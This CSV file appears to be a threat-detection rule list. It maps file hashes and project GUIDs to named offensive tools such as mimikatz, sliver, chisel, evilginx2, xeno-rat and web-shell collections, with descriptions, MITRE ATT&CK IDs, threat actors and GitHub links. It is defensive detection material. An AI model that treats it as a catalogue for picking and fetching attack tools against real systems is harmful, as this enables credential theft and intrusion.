"*70527328-DCEC-4BA7-9958-B5BC3E48CE99*",".{0,1000}70527328\-DCEC\-4BA7\-9958\-B5BC3E48CE99.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","#GUIDproject","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","28754"
"*7054d78708ce7b1ac69aec272a9121fedf2ed2ae9d63813dee67a6f0838358f9*",".{0,1000}7054d78708ce7b1ac69aec272a9121fedf2ed2ae9d63813dee67a6f0838358f9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28756"
"*7055ed92ac04384f9e29339b6f64d5cf2f76dbdcc25feb0772020319675524f3*",".{0,1000}7055ed92ac04384f9e29339b6f64d5cf2f76dbdcc25feb0772020319675524f3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28757"
"*7056cfa64f838c96283c9df4f6318b952b0eca88de761fa37562c56b28f21220*",".{0,1000}7056cfa64f838c96283c9df4f6318b952b0eca88de761fa37562c56b28f21220.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28758"
"*705c75cc65b5a149efce2441e69749ad714da4a6d142a8b948b5ecb9e98ed69c*",".{0,1000}705c75cc65b5a149efce2441e69749ad714da4a6d142a8b948b5ecb9e98ed69c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28759"
"*7067f8017505177909b1e7100dfe85349cef8c01858be393fa2c5cc8c718c0af*",".{0,1000}7067f8017505177909b1e7100dfe85349cef8c01858be393fa2c5cc8c718c0af.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","28760"
"*706cab3e36eec233139d8b353970343383d32d87fa1eb722c5cef1ca3511256a*",".{0,1000}706cab3e36eec233139d8b353970343383d32d87fa1eb722c5cef1ca3511256a.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","28761"
"*706dbc3ea14dde772f2c6d4c85e20e4912dc2047c6dd2b00e2f995f9423518fb*",".{0,1000}706dbc3ea14dde772f2c6d4c85e20e4912dc2047c6dd2b00e2f995f9423518fb.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","28762"
"*7076e114583006ebcf8f50ab7540ce8552af788431ef2a89227e74876dd13e17*",".{0,1000}7076e114583006ebcf8f50ab7540ce8552af788431ef2a89227e74876dd13e17.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28763"
"*70795D10-8ADF-4A4D-A584-9AB1BBF40D4B*",".{0,1000}70795D10\-8ADF\-4A4D\-A584\-9AB1BBF40D4B.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","28764"
"*709122fccdbf1d9d88fd3d6d52968feb83a696ff4504f1a26ce562707b0cc94a*",".{0,1000}709122fccdbf1d9d88fd3d6d52968feb83a696ff4504f1a26ce562707b0cc94a.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","28766"
"*70920ad4b6ad5aa2ef24ec79e80de4f32f79b2cf4c1248c94d90456b8f269951*",".{0,1000}70920ad4b6ad5aa2ef24ec79e80de4f32f79b2cf4c1248c94d90456b8f269951.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28767"
"*709b71707b611ad7d608eceaa3004435130cf7be89216cba2b4fdda77b3edcaa*",".{0,1000}709b71707b611ad7d608eceaa3004435130cf7be89216cba2b4fdda77b3edcaa.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","28768"
"*70a7532167ee90a2acf9daefea34f8aecc695f6c0cea9ed25871aa02494a1aa9*",".{0,1000}70a7532167ee90a2acf9daefea34f8aecc695f6c0cea9ed25871aa02494a1aa9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28771"
"*70aa63f7c9036825d5d1839815fb9d5528faee96f2450cfdfa074f827fe25edf*",".{0,1000}70aa63f7c9036825d5d1839815fb9d5528faee96f2450cfdfa074f827fe25edf.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28772"
"*70aaf2b367b97fa35d599a6db4d08875206ef18c99d8c8c5b5f25e4f5509931a*",".{0,1000}70aaf2b367b97fa35d599a6db4d08875206ef18c99d8c8c5b5f25e4f5509931a.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","28773"
"*70ad2f1fec1e1e6f270ea4fb6b83889c1b5d1fa1475eaeefce3cced3589962d9*",".{0,1000}70ad2f1fec1e1e6f270ea4fb6b83889c1b5d1fa1475eaeefce3cced3589962d9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28774"
"*70b5a24ffc45a0c4eadd31d0e202ec9059efc0f0881a50c28ca8ebc2504685e7*",".{0,1000}70b5a24ffc45a0c4eadd31d0e202ec9059efc0f0881a50c28ca8ebc2504685e7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28775"
"*70b62b72b3206c93a43646a86ed17e93151626303dd3408583aceba93fc24c3e*",".{0,1000}70b62b72b3206c93a43646a86ed17e93151626303dd3408583aceba93fc24c3e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28776"
"*70b9d9d9e9ae286c9bf21267d02108270e8c2bd924d7718a43875deb623b762a*",".{0,1000}70b9d9d9e9ae286c9bf21267d02108270e8c2bd924d7718a43875deb623b762a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28777"
"*70BCFFDB-AE25-4BEA-BF0E-09DF06B7DBC4*",".{0,1000}70BCFFDB\-AE25\-4BEA\-BF0E\-09DF06B7DBC4.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","0","#GUIDproject","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","28780"
"*70c104eb31780222a3a882a3728cafeeb308d8ff718a5c9ce62778d579b3de86*",".{0,1000}70c104eb31780222a3a882a3728cafeeb308d8ff718a5c9ce62778d579b3de86.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","#filehash","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","28781"
"*70c45d173ea7e04565166eca5d699763fc4d7c21eba93c6db67c727b0d1f23fa*",".{0,1000}70c45d173ea7e04565166eca5d699763fc4d7c21eba93c6db67c727b0d1f23fa.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28782"
"*70c62e0f2725a158d53c4fe2be205bb5ae07264a85af693741761e7fb7c8c521*",".{0,1000}70c62e0f2725a158d53c4fe2be205bb5ae07264a85af693741761e7fb7c8c521.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28783"
"*70c62e0f2725a158d53c4fe2be205bb5ae07264a85af693741761e7fb7c8c521*",".{0,1000}70c62e0f2725a158d53c4fe2be205bb5ae07264a85af693741761e7fb7c8c521.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28784"
"*70c7134c48911888f49f438586cde06c5da2d333921164a540935c25b612fcc6*",".{0,1000}70c7134c48911888f49f438586cde06c5da2d333921164a540935c25b612fcc6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28785"
"*70cbfdb9e353bae5fd131519b3258be7c9f46e60d97737dfcd386e2c0b61ebf5*",".{0,1000}70cbfdb9e353bae5fd131519b3258be7c9f46e60d97737dfcd386e2c0b61ebf5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28786"
"*70cee544c4fdb709afd0e36f93a68f289f844d0373a53ae1e7eb257f7410af36*",".{0,1000}70cee544c4fdb709afd0e36f93a68f289f844d0373a53ae1e7eb257f7410af36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28787"
"*70ddb33c1ce8b8ac5d3a7339ed37fedf436f91e5a31bdd19c8029968766ad3e6*",".{0,1000}70ddb33c1ce8b8ac5d3a7339ed37fedf436f91e5a31bdd19c8029968766ad3e6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28789"
"*70e7482f10e68718812ed28e9511b2e9b005a82ac058153ac761fdfec9a115bf*",".{0,1000}70e7482f10e68718812ed28e9511b2e9b005a82ac058153ac761fdfec9a115bf.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28790"
"*70eab06c1a1f041d6e3d65e83623ba9097855ec1e8330d1bfbe4153d23dd4989*",".{0,1000}70eab06c1a1f041d6e3d65e83623ba9097855ec1e8330d1bfbe4153d23dd4989.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","28791"
"*70ef0d3588b87bd71c2774c1bb177f59ae31a99b1a4ef82f7d2a16175c3caaf6*",".{0,1000}70ef0d3588b87bd71c2774c1bb177f59ae31a99b1a4ef82f7d2a16175c3caaf6.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","#filehash","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","28792"
"*70f0161252fd75f2cbd71a5fadaa3346b5336bdfebfcf27fa70f37349d193513*",".{0,1000}70f0161252fd75f2cbd71a5fadaa3346b5336bdfebfcf27fa70f37349d193513.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28793"
"*70f60b2e7f6e64317222ec504392f975e14fa9cad5ed05329f6eb8d7bcff6956*",".{0,1000}70f60b2e7f6e64317222ec504392f975e14fa9cad5ed05329f6eb8d7bcff6956.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","28797"
"*70f7957d5aafdfe4655ae31e786310395b301e570e75e91c136d0b142f5024b6*",".{0,1000}70f7957d5aafdfe4655ae31e786310395b301e570e75e91c136d0b142f5024b6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28798"
"*70fae385cd6c9bbcc73c17efabd236f0a0bfe00d11b0c9360651ec7e4baf42c2*",".{0,1000}70fae385cd6c9bbcc73c17efabd236f0a0bfe00d11b0c9360651ec7e4baf42c2.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","28800"
"*70fc96e2f1e0cd752068e94fb4f37b3f19d670243921f76b0f2114578151f1e3*",".{0,1000}70fc96e2f1e0cd752068e94fb4f37b3f19d670243921f76b0f2114578151f1e3.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","28801"
"*7103d888907045c6387e39b275db1a7e6fdb22d3d6e15ac6a44ddb1df80c76a4*",".{0,1000}7103d888907045c6387e39b275db1a7e6fdb22d3d6e15ac6a44ddb1df80c76a4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28804"
"*710db84c96a19c705db2d2111576fd459c7d999080462000cf93d02733e4521a*",".{0,1000}710db84c96a19c705db2d2111576fd459c7d999080462000cf93d02733e4521a.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","28806"
"*7111362ec699a575cc5bec3f2e6c4b29b97c42704456ddd00c519e7613b9b67b*",".{0,1000}7111362ec699a575cc5bec3f2e6c4b29b97c42704456ddd00c519e7613b9b67b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28808"
"*71146194df27fa843b2d1e8e5bbc924b19bf61f6d89d3ac76aaf8270c443fe78*",".{0,1000}71146194df27fa843b2d1e8e5bbc924b19bf61f6d89d3ac76aaf8270c443fe78.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","28809"
"*7116769dee3a57fd5aa99823a89114b267b47902f5b71c29e6022926544c36a3*",".{0,1000}7116769dee3a57fd5aa99823a89114b267b47902f5b71c29e6022926544c36a3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28810"
"*7116f92ef4bdbb61fe15e5158197c984bd61ea944d95a854f30e58b19db43dc1*",".{0,1000}7116f92ef4bdbb61fe15e5158197c984bd61ea944d95a854f30e58b19db43dc1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28811"
"*711eb4700b1a0609805647b1cd85fe3a3a0122eb17a2bca7488298a27d4d46c5*",".{0,1000}711eb4700b1a0609805647b1cd85fe3a3a0122eb17a2bca7488298a27d4d46c5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28813"
